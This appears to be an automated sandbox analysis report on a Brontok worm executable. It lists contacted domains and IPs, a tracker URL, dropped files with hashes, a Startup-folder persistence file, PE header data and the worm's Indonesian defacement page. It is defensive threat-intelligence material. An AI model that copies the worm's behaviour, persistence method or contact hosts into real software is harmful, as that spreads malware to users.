www.20mbweb.com | 104.21.48.1 | true | false | | unknown
www.debuging.com | 72.14.178.174 | true | true | | unknown
www.kaskus.co.id | 103.6.117.3 | true | true | | unknown
www.fajarweb.com | 3.94.10.34 | true | true | | unknown
kaskus.com | 103.6.117.2 | true | true | | unknown
www.hugedomains.com | 172.67.70.191 | true | true | | unknown
www.kaskus.com | unknown | unknown | false | | unknown
www.17tahun.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.kaskus.com/? | true | Avira URL Cloud: safe | unknown
http://www.20mbweb.com/Kids/dbrotlu/IN18.css | false | Avira URL Cloud: safe | unknown
http://www.fajarweb.com/? | true | Avira URL Cloud: malware | unknown
http://www.20mbweb.com/Kids/dbrotlu/Bron-IDUTSPLD.css | false | Avira URL Cloud: safe | unknown
http://www.debuging.com/WS1/cgi/x.cgi?NAVG=Tracker&username=%64%65%6C%62%65%6C%62%72%6F | true | Avira URL Cloud: safe | unknown
http://www.17tahun.com/? | true | Avira URL Cloud: safe | unknown
http://www.20mbweb.com/Kids/dbrotlu/Host18.css | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.70.191 | www.hugedomains.com | United States | 13335 | CLOUDFLARENETUS | true
104.21.48.1 | www.20mbweb.com | United States | 13335 | CLOUDFLARENETUS | false
3.130.204.160 | hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com | United States | 16509 | AMAZON-02US | true
3.94.10.34 | www.fajarweb.com | United States | 14618 | AMAZON-AESUS | true
103.6.117.2 | kaskus.com | Indonesia | 132164 | KASKUSNETWORKS-ASPTDartaMediaIndonesiaID | true
103.6.117.3 | www.kaskus.co.id | Indonesia | 132164 | KASKUSNETWORKS-ASPTDartaMediaIndonesiaID | true
72.14.178.174 | www.debuging.com | United States | 63949 | LINODE-APLinodeLLCUS | true
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1592395
                                      Start date and time:2025-01-16 04:06:31 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:26
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      Analysis Mode:stream
                                      Analysis stop reason:Timeout
                                      Sample name:Pedang @ P#U00ecsau.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:Pedang @ Psau.exe
                                      Detection:MAL
                                      Classification:mal100.spre.evad.winEXE@29/18@9/24
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetValueKey calls found.
                                      • VT rate limit hit for: hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                                      • VT rate limit hit for: www.debuging.com
                                      Process:C:\Users\user\AppData\Local\lsass.exe
                                      File Type:HTML document, ASCII text, with very long lines (7836), with no line terminators
                                      Category:dropped
                                      Size (bytes):7836
                                      Entropy (8bit):6.1583163930957925
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:0E7B4235D81334870F69EF97FB1A2B65
                                      SHA1:C12FEFF9A185F7D2581FF842357D4F91D4A69B89
                                      SHA-256:254626E9950B281244D4488BB88609405259160F90E4DF111A0992E39C3F685A
                                      SHA-512:A9C303274C972BFDFB55B1D5B571A1AC67BEC81C728835D84C8D838C6E1DEBB2E46AC5FA51C9F5E83B4E0CCC8483CE011A8A30C843DA2DF298498980A437CC7B
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i
                                      Process:C:\Users\user\AppData\Local\smss.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):10
                                      Entropy (8bit):2.721928094887362
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:07A59466AF15A4BF724770F0EE924A57
                                      SHA1:A55F936CE3447D28931BF85C83E2029DC2CF8CFD
                                      SHA-256:B8D6C940EA31312FD618DDD9BEFA89555F5501B025EBBD7858CE0A83814879A9
                                      SHA-512:9901DFAA646898FA7CFDF84FBC1DDA47511EDA5F827BCE76E31E6F1AA601F7ED0D70FDBB9023FA558218D7C64699EAE90397D8B43C117232D491FD06C44DD079
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:01152207..
                                      Process:C:\Users\user\AppData\Local\lsass.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:81051BCC2CF1BEDF378224B0A93E2877
                                      SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                      SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                      SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:..
                                      Process:C:\Users\user\AppData\Local\lsass.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):62
                                      Entropy (8bit):4.845663149851382
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5B19C6C580B9595DCD141EA6FD2B22E6
                                      SHA1:8DE8E97652FE90AA7959C2BE83CA539F419C5020
                                      SHA-256:78B454B11F1219F24729304C293383B0C3E1D84E7808F21C1AA4EBEA249C34B3
                                      SHA-512:1E7A0EECCA2BB5DAF80C87A286705E35D0F488D62123AB28DB76CC45B6AE3E6623EA42549EC4E8ED95B00DD41D8BF645024C09C20B37C226B3BDD97F1D3E0606
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:EXIT >> "C:\Users\user\AppData\Local\BronFoldNetDomList.txt"..
                                      Process:C:\Users\user\AppData\Local\svchost.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):15
                                      Entropy (8bit):3.7735572622751845
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A763F01F928FF565B320AC0EB2158995
                                      SHA1:5371623DA9EB2D46886C3D4A33059D76749B79DC
                                      SHA-256:97B1D0E9352FF0E85EEFF7A3EC6E98B61CF8071418892C9E2967F43257A19BA9
                                      SHA-512:CC07BE9EFCBDF4327F5DC829E534EF0B3F6B666515F956B5C54FE66D449B4EDAA481858F767372C2046F825F67109CB6352FF2BA3E0A745CC9AD66DA154BA5DB
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:Invalid Request
                                      Process:C:\Users\user\AppData\Local\winlogon.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):51
                                      Entropy (8bit):4.414798567708406
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C943AE4292F2EA5D3A9FEA05D9AF4039
                                      SHA1:B03418E2F34D43C6602D385C36F6B817DC57C6E5
                                      SHA-256:D9E768F8B796558E7E8D720EBC599067B1017440BCA545028472001F399E7400
                                      SHA-512:0C5037A28D76242A39412B1BA46BC1741EAF028C3FCAC11E8C45E6EC5A323378A1C68309A2385F1FB86A4A8EFD24E3E06AF72E8BE465F6BC7627FA3C8B2F66EB
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:Brontok.A..By: HVM31..-- JowoBot #VM Community --..
                                      Process:C:\Users\user\AppData\Local\inetinfo.exe
                                      File Type:HTML document, ASCII text, with very long lines (7793), with no line terminators
                                      Category:dropped
                                      Size (bytes):7793
                                      Entropy (8bit):6.162751209859967
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:28F8ED3AA6096EC65308B44E71087CC2
                                      SHA1:74AB22E65DE276A266356D0031B0A8BF3B5ECBA9
                                      SHA-256:02B73B372D7168F2F88B20C8B1435CEDECD6D7EFD4F71848D5C71CE0A4E4787B
                                      SHA-512:3136A9F65EA2E40F4053E2C70470DA112FD70F68E2EB7AF0F9153674F089344DEAEC60FC27B900AF495207920AAB0267526A5A6D5A66751CE2B816F4C3EEB996
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i
                                      Process:C:\Windows\SysWOW64\explorer.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):423818
                                      Entropy (8bit):5.375342137412923
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:64A3E7576CF5C372B32425F19E7DA148
                                      SHA1:33D20D9F1C90BA594F1ED934EDA6F74489B390B9
                                      SHA-256:57E97D2C6B44FC33263BB6D54C4A856781F92AA0DB9DC9E238DE1F5CF0825AEF
                                      SHA-512:DC43BECFB76416B959736777883B65823F9F2B0343DF93D9667DB250C51BDB70BE994BCBBC43C316AA743CB81875E5EB6995D7B16A7F877D563CA7D936931A0A
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:...P................d...................D...................System.StructuredQueryType.Action.System.StructuredQueryType.AllBitsSet.System.StructuredQueryType.AnyBitsSet.System.StructuredQueryType.Blurb.System.StructuredQueryType.Boolean.=TRUE.=FALSE.System.StructuredQueryType.ByteUnit.=1.=1024.=1048576.=1073741824.=1099511627776.=1125899906842624.=1152921504606846976.=1000.=1000000.=1000000000.=1000000000000.=1000000000000000.=1000000000000000000.System.StructuredQueryType.DateTime.N00UUUUUUUK7ZZNNU.N00UUUUUUUK1ZZNNU.N00UUUUUUUK2ZZNNU.N00UUUUUUUK3ZZNNU.N00UUUUUUUK4ZZNNU.N00UUUUUUUK5ZZNNU.N00UUUUUUUK6ZZNNU.N00UK1UUUUUUZZNNU.N00UK2UUUUUUZZNNU.N00UK3UUUUUUZZNNU.N00UK4UUUUUUZZNNU.N00UK5UUUUUUZZNNU.N00UK6UUUUUUZZNNU.N00UK7UUUUUUZZNNU.N00UK8UUUUUUZZNNU.N00UK9UUUUUUZZNNU.N00UK10UUUUUUZZNNU.N00UK11UUUUUUZZNNU.N00UK12UUUUUUZZNNU.R00UUUUUUUUZDNNU.R00UUUUUUUUD-1DNNU.R00UUUUUUUUD1DNNU.R00UUUUUUUUZZXD-1NU.R00UUUUUUUUZZXD1NU.R00UUUUUUUUZWNNU.R00UUUUUUUUW-1WNNU.R00UUUUUUUUW1WNNU.R00UUUUUUUUZZXW-1NU.
                                      Process:C:\Users\user\AppData\Local\svchost.exe
                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (952), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):45255
                                      Entropy (8bit):5.4236523451384056
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:1D0CAC72508CECE52B0746861E37A1B3
                                      SHA1:17576F47D93B90A7B74361B0EDB34BB41E405D8F
                                      SHA-256:DD26706C217229CE141A799487D54991BB5B7EE9D59FFB8F1598B9DCA3374E25
                                      SHA-512:7D40A3E4554B5910677B2BD4A4DD38D762F5AB8E0B0B01B257C422AFE00A45BC72879CC0A1302EF143DA3AF18B2D2AA93A28EC5DF8BA991EF89EC3627D5B9A2F
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. Start cookieyes banner -->..<script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script>.. End cookieyes banner -->..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. Required meta tags -->..<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">..<link rel="preconnect" href="https://www.google.com">..<link rel="preconnect" href="https://www.gstatic.com" crossorigin>..<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />..<link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css">..<link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a">..<link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/responsive.css?aa=2021-06-09a">..<link rel="stylesheet" href="https
                                      Process:C:\Users\user\AppData\Local\lsass.exe
                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):167
                                      Entropy (8bit):4.43745738033235
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:0104C301C5E02BD6148B8703D19B3A73
                                      SHA1:7436E0B4B1F8C222C38069890B75FA2BAF9CA620
                                      SHA-256:446A6087825FA73EADB045E5A2E9E2ADF7DF241B571228187728191D961DDA1F
                                      SHA-512:84427B656A6234A651A6D8285C103645B861A18A6C5AF4ABB5CB4F3BEB5A4F0DF4A74603A0896C7608790FBB886DC40508E92D5709F44DCA05DD46C8316D15BF
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>cloudflare</center>..</body>..</html>..
                                      Process:C:\Users\user\AppData\Local\inetinfo.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):13038
                                      Entropy (8bit):3.5685882876044626
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:8E4F39DEC4170B7878DB59D3B4C68049
                                      SHA1:57DB9B87F9652247FA521BE7BA9363F8ED01EA68
                                      SHA-256:89C1DD3CB1A92C84259FEC1F5C51415895FEF892EDC61E0E8CA3B4287D8A724D
                                      SHA-512:DBD6411C4C74C628004618D8D2CD4CBF1DEFF3B4CBA57BDE0264B14EF4EE8204609776FC22F4F5A8ABC82917A871E79337D7140DA4EA736AABAD5245340C0D7B
                                      Malicious:false
                                      Reputation:unknown
                                      Process:C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):13038
                                      Entropy (8bit):3.568095523808254
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:FB6C52197D1DE8373BACE6DC85084424
                                      SHA1:1512E3A62D4DD4B70B0763A4D1A0AFB4F90F87A9
                                      SHA-256:E0AFF92D5FE75EC78ECE8B2AB9FDD6BEF786938DAE3888D0A716C00B06652229
                                      SHA-512:A3E28275F5173710982C6FC90EFC8CBFC3F7487F7BB7269CAA3806D8FA457ACCA02C1C0D75B6D800D6CC9E8CA23E2EB235C7FB070D0E116836B95FD3650BE4D9
                                      Malicious:false
                                      Reputation:unknown
                                      Process:C:\Users\user\AppData\Local\services.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):16384
                                      Entropy (8bit):3.008611795358183
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:D5A5D8AE6D41DEE190F46AADCF2DA5B7
                                      SHA1:F8D6AA893D8A4CF54746C6B74E10F9338F3A231E
                                      SHA-256:50546746247BBF109BC16FA36B70F8DBBAF28B597A9F34A77C5F526C209B8BD2
                                      SHA-512:44B84E17656950DFC922BF19D47073A54CA0B60AB6EDF70B742738C83302D928AABD30CC0844A16D88457A57D69557D2CDD61994C98667A1889DE43C280C4398
                                      Malicious:false
                                      Reputation:unknown
                                      Process:C:\Users\user\AppData\Local\smss.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):13038
                                      Entropy (8bit):3.5674694812999976
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:63E52F9609E1B40D2453139175DC76CD
                                      SHA1:7409346D174F8865D3F2D627A4A1779B3306A307
                                      SHA-256:DB614CED6B586CE5B5A95E166BF5D78EAD337D8C25D551C0B3E4D153C28EEC9E
                                      SHA-512:7ACF8DC0A4DDACB6371C91CA5B84041F977984D5DE073DBBA20F731518945EA13285358059D4C8CC7DD64077CA8190DE9A707DB9C0B2C68CC1744E933A9EFFC9
                                      Malicious:false
                                      Reputation:unknown
                                      Process:C:\Users\user\AppData\Local\svchost.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):13038
                                      Entropy (8bit):3.5682653151622565
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:B80C75B3FA13DA853AF00F3405F2D9A2
                                      SHA1:15BD494CF4F22003C7A7123D68E236198FA606EB
                                      SHA-256:31F15428F9021009F44611CD63B5BADA898ED5B929057FDE0109DEA4286333CB
                                      SHA-512:B75A3206FFF29DD599A58620B78EC80823CF338D38B11C8FA0CA33AD2CF335D52F40BEB5527F3692777F6CDBBD8A77CD43B4D81A28216C3F30EF83C809107F56
                                      Malicious:false
                                      Reputation:unknown
                                      Process:C:\Users\user\AppData\Local\inetinfo.exe
                                      File Type:HTML document, ASCII text, with very long lines (7808), with no line terminators
                                      Category:dropped
                                      Size (bytes):7808
                                      Entropy (8bit):6.163032638276561
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:04F21D16EB31DEEF7199C728FEA8101C
                                      SHA1:ED0332CBDF819AB5845090C2A74F139784B43E35
                                      SHA-256:797091D76BA7A6E43D47EA7C176882BFF9CC483ADCCD0D61B0482949F32E9B64
                                      SHA-512:323D2F6171CB4A24BD2BBFFC9A504FFBBC911B64A2E7415523BC89C1EDA27D81F37FA59A06C57D6D9DE325F4F7EA8F3768A5EB57D3F00629FAEDE2C691F13954
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i
                                      Process:C:\Users\user\AppData\Local\smss.exe
                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45327
                                      Entropy (8bit):7.334225843037343
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:32798AD1498394AC5602E8801B00AADB
                                      SHA1:D9720C040D947477392E68B92A0575B8D9D31609
                                      SHA-256:1AFB0258C432833BAEFE232E6F0C2015259F536670E2A8FE1CB6B191776C7864
                                      SHA-512:7E5E9BF1DFAA68C8C3F89016EA6A56C108A928F1C2AF90D94CE1C16DEADE204FBF8A1ED2338C9C62AD59F681C743A3B6B3B0B95E1E542484B3F6EF8F712A4AF6
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: INDICATOR_EXE_Packed_MEW, Description: Detects executables packed with MEW, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Reputation:unknown
                                      Process:C:\Users\user\AppData\Local\winlogon.exe
                                      File Type:HTML document, ASCII text, with very long lines (910), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):978
                                      Entropy (8bit):5.522758802993206
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:01AC9232533E8450263B99B05A45ED98
                                      SHA1:95C11E32B82B4470B53EC919EB64AF32D79D0DBF
                                      SHA-256:62D82408A8FF3E6F10BAFBF5A7A16AE34153AB0E930038CE4221C9D155FDDF0B
                                      SHA-512:9743FDA6F5FE418095BEEB4CE7C6F8956C8DC66B62A1DF8847D6FDD750B6B9DC383C5642A5DE876E95E11D18652CBAA0AC6DC4D953C5F30BB8F515A474BBF0E0
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<HTML><HEAD><TITLE>BRONTOK.A[18].NorBet [ By: HVM31 -- JowoBot #VM Community ]</TITLE></HEAD><BODY bgcolor=#79C107><CENTER><H1><Font face=Verdana color=#FF0000><U>BRONTOK.A[18].NorBet</U></Font></H1><H3><Font face=Verdana color=#FFFFFF>-- Hentikanlah kebobrokan di negeri ini --<br><br>1. Penjarakan Koruptor, Penyelundup, Tukang Suap, & Bandar NARKOBA<br>( Send To NUSAKAMBANGAN)<br><br>2. Stop Free Sex, Aborsi, & Prostitusi<br>( Go To HELL )<br><br>3. Stop pencemaran lingkungan, pembakaran hutan & perburuan liar. <br><br>4. Stop Pornografi & Pornoaksi<br><br>5. SAY NO TO DRUGS !!!<br><br><br><font color=#1122FF size=5>-- KIAMAT SUDAH DEKAT --</font><br><br><br>Elang Brontok (Spizaetus Cirrhatus)<br><H2><Font face=Verdana color=#E2EA05>[ By: HVM31 ]<br>-- JowoBot #VM Community --</Font></H2></font></h3><h4>!!! Akan Kubuat Mereka (VM lokal yg cengeng & bodoh) Terkapar !!!</h4></CENTER></BODY></HTML>..<Script Language=Javascript>..alert ("Anda Setuju?");..</Script>..
                                      File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.334225843037343
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.29%
                                      • Mew compressed Win32 Executable (67782/24) 0.67%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Targa bitmap (Original TGA Format) (7/2) 0.00%
                                      File name:Pedang @ P#U00ecsau.exe
                                      File size:45'327 bytes
                                      MD5:32798ad1498394ac5602e8801b00aadb
                                      SHA1:d9720c040d947477392e68b92a0575b8d9d31609
                                      SHA256:1afb0258c432833baefe232e6f0c2015259f536670e2a8fe1cb6b191776c7864
                                      SHA512:7e5e9bf1dfaa68c8c3f89016ea6a56c108a928f1c2af90d94ce1c16deade204fbf8a1ed2338c9c62ad59f681c743a3b6b3b0b95e1e542484b3f6ef8f712a4af6
                                      SSDEEP:768:jOx/pm31OEkuz13gXPPeylSNVPYyl5YtESv+UOv35BMC7:iBpm31nku+Xeyggylmw5v
                                      TLSH:7B13AE51431CDADEC1B26635DE2D216A3BE51C334936F1EB8CA2BE0B6DB5C2395C2903
                                      File Content Preview:MZ..........PE..L.................................................@............................................................................................................................................................................................
                                      Icon Hash:3686f0ca42720e01
                                      Entrypoint:0x430ef6
                                      Entrypoint Section:u
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:
                                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:87bed5a7cba00c7e1f4015f1bdae2183
                                      Instruction
                                      jmp 00007F7F84FDF6AEh
                                      or al, 60h
                                      add al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      int 0Eh
                                      add eax, dword ptr [eax]
                                      or al, 60h
                                      add al, byte ptr [eax]
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30efb | 0x14 | u
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x30dcd | 0x100 | u
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      BLDF | 0x1000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      u | 0x26000 | 0x1a000 | 0xaf0f | 1db6ea176983ec9118b86f589f898b48 | False | 0.7850050206404106 | data | 7.358577776223794 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_ICON | 0x2e0e5 | 0x1ca8 | Device independent bitmap graphic, 48 x 96 x 24, image size 6912 | | | 0.16984732824427481
                                      RT_ICON | 0x2fd8d | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 | | | 0.16944444444444445
                                      RT_ICON | 0x30a35 | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 768 | | | 0.2511467889908257
                                      RT_GROUP_ICON | 0x30d9d | 0x30 | data | | | 0.9375
                                      DLL | Import
                                      kernel32.dll | LoadLibraryA, GetProcAddress